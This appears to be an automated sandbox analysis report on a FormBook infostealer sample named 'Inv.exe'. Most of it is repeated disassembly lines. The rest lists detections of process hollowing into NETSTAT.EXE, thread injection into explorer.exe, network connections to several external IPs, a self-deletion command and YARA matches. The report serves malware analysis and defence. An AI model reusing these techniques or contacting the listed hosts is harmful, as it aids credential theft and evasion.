Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E158EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E590AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E19080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E93884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E93884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E30050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E30050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EA41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E461A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E461A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E969A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E42990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E34120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E276E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E416E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E58EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E436CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ECFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E946A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EDAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EDAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ECFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E48E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E537F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E28794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01236B80 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,
          Source: C:\Users\user\Desktop\Inv.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123C080 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123C080 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.217 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 172.96.186.206 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Inv.exe | Section loaded: unknown target: C:\Users\user\Desktop\Inv.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inv.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inv.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\Inv.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Inv.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Inv.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Inv.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 3F0000
          Source: C:\Users\user\Desktop\Inv.exe | Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: explorer.exe, 00000002.00000000.675251989.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_0123D7B7 cpuid
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01238431 GetLocalTime,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Command and Scripting Interpreter2 | Path Interception | Process Injection512 | Rootkit1 | Credential API Hooking1 | System Time Discovery1 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
